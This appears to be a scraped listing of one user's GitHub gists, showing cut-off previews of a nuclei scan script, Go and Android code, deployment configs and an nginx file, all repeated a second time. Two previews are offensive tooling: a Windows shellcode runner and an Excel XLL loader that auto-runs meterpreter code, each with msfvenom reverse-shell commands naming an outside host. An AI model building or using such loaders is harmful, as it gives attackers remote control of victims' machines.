Paul PaulSec

## nuclei.sh
#!/bin/bash
set -x
foo=`date +'%Y_%m_%d'`
database="/path/to/my/sql_app.db"
nucleitemplates="/path/to/my/nuclei-templates/"
cd $nucleitemplates
git pull
output_folder="/tmp/nuclei/$foo"
mkdir -p $output_folder
echo -e ".mode csv\n.out /tmp/nuclei/$foo/domains.csv\nselect domain from domain;" | sqlite3 $database

## main.go
package main

import (
	"crypto/tls"
	"io/ioutil"
	"net/http"

	"github.com/gin-gonic/gin"

	wappalyzer "github.com/projectdiscovery/wappalyzergo"

## MainActivity.java
package com.example.myapplication;

import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.util.Base64;
import android.util.Log;
import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

## failed_build.txt
 > Task :remoteClientLib:mergeDebugJniLibFolders FAILED
 FAILURE: Build failed with an exception.
 * What went wrong:
 Failed to capture fingerprint of input files for task ':remoteClientLib:mergeDebugJniLibFolders' property 'sourceFolderInputs' during up-to-date check.
 > Could not list contents of '/builds/PaulSec/kali-nethunter-kex/remoteClientLib/src/main/jniLibs/arm64-v8a'. Couldn't follow symbolic link.
 * Try:

## now.json
{
    "version": 2,
    "name": "android-version-checker",
    "public": false,
    "builds": [{ "src": "main.py", "use": "@now/python" }],
    "routes": [
        { "src": "/", "dest": "main.py" },
        { "src": "/app/(.*)", "dest": "main.py" }
    ]
}

## gist:97f5cde082058a1836b1eda86d308794
#!/bin/bash
cd /path/to/my/app/
source env/bin/activate
python manage.py makemigrations;
python manage.py migrate;
python manage.py collectstatic --noinput;
gunicorn --access-logfile - --workers 1 --bind unix:/path/to/my/app/socket.sock cfptime.wsgi:application

## nginx.conf
user www-data;
worker_processes 4;
pid /run/nginx.pid;

http {

    server {
        listen 80 default_server;
        listen [::]:80 default_server ipv6only=on;
        return 301 https://$host$request_uri;

## index.haml
.page
  .confirm
    .inner
      You're about to hack time, are you Sure?
      %input{:type => 'radio', :name => 'hack', :id => 'warp', :value => 'yes'}
      %label{:for => 'warp'}
        %span Yes
      %input{:type => 'radio', :name => 'hack', :id => 'nope', :value => 'no'}
      %label{:for => 'nope'}
        %span No

## shellcodeExecute.c
// Compile with: cl.exe shellcode_execute.c
//
// Author: Arno0x0x, Twitter: @Arno0x0x

#include <Windows.h>

int main()
{
	// Payload obtained with "msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.52.134"
	unsigned char b[] =

## shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void);

DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	unsigned char b[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
	#!/bin/bash
	set -x
	foo=`date +'%Y_%m_%d'`
	database="/path/to/my/sql_app.db"
	nucleitemplates="/path/to/my/nuclei-templates/"
	cd $nucleitemplates
	git pull
	output_folder="/tmp/nuclei/$foo"
	mkdir -p $output_folder
	echo -e ".mode csv\n.out /tmp/nuclei/$foo/domains.csv\nselect domain from domain;" \| sqlite3 $database
	package main

	import (
	"crypto/tls"
	"io/ioutil"
	"net/http"

	"github.com/gin-gonic/gin"

	wappalyzer "github.com/projectdiscovery/wappalyzergo"
	package com.example.myapplication;

	import android.support.v7.app.AppCompatActivity;
	import android.os.Bundle;
	import android.util.Base64;
	import android.util.Log;
	import java.security.SecureRandom;
	import javax.crypto.Cipher;
	import javax.crypto.spec.IvParameterSpec;
	import javax.crypto.spec.SecretKeySpec;
	> Task :remoteClientLib:mergeDebugJniLibFolders FAILED
	FAILURE: Build failed with an exception.
	* What went wrong:
	Failed to capture fingerprint of input files for task ':remoteClientLib:mergeDebugJniLibFolders' property 'sourceFolderInputs' during up-to-date check.
	> Could not list contents of '/builds/PaulSec/kali-nethunter-kex/remoteClientLib/src/main/jniLibs/arm64-v8a'. Couldn't follow symbolic link.
	* Try:
	{
	"version": 2,
	"name": "android-version-checker",
	"public": false,
	"builds": [{ "src": "main.py", "use": "@now/python" }],
	"routes": [
	{ "src": "/", "dest": "main.py" },
	{ "src": "/app/(.*)", "dest": "main.py" }
	]
	}
	#!/bin/bash
	cd /path/to/my/app/
	source env/bin/activate
	python manage.py makemigrations;
	python manage.py migrate;
	python manage.py collectstatic --noinput;
	gunicorn --access-logfile - --workers 1 --bind unix:/path/to/my/app/socket.sock cfptime.wsgi:application
	user www-data;
	worker_processes 4;
	pid /run/nginx.pid;

	http {

	server {
	listen 80 default_server;
	listen [::]:80 default_server ipv6only=on;
	return 301 https://$host$request_uri;
	.page
	.confirm
	.inner
	You're about to hack time, are you Sure?
	%input{:type => 'radio', :name => 'hack', :id => 'warp', :value => 'yes'}
	%label{:for => 'warp'}
	%span Yes
	%input{:type => 'radio', :name => 'hack', :id => 'nope', :value => 'no'}
	%label{:for => 'nope'}
	%span No
	// Compile with: cl.exe shellcode_execute.c
	//
	// Author: Arno0x0x, Twitter: @Arno0x0x

	#include <Windows.h>

	int main()
	{
	// Payload obtained with "msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.52.134"
	unsigned char b[] =
	// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
	#include <Windows.h>

	__declspec(dllexport) void __cdecl xlAutoOpen(void);

	DWORD WINAPI ThreadFunction(LPVOID lpParameter)
	{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	unsigned char b[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"